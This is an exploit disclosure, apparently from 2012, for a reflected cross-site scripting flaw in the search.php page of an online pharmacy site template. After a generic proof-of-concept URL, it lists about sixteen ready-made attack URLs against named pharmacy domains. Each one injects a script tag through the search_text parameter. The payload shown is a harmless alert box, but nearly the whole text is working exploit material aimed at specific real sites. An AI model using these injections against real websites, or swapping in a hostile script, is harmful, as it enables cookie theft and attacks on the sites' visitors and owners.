+-------------------------------------------------------------------------+
# Exploit Title : Online Pharmacy - Website XSS (Cross Site Scripting)
# Author : Atmon3r
# Date : 26/02/2012
# Editor : Lupu, Marianna
# Perso : Do you want drUgs?
# Xss type : $_GET
+-------------------------------------------------------------------------+
[+] POC:
http://{website}/search.php?search_text=[XSS]
[+] Exploits
http://prohealthpharma.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://drug-brand-cialis.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://drug-clomid.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://drugsforyou.net/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://drug-clomid.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://drugbrand-cialis.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://gobuypills.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://ed-pharmarx.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://buyingprograf.org/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://drug-accutane.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://bestsellers-rx.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=12&I1.y=14
http://drug-doxycycline.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://buyingcozaar.org/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://buyinglamictal.org/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://drug-brand-cialis.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
http://drugbrand-cialis.com/search.php?search_text=/"><script>alert(1)</script>&I1.x=3&I1.y=11
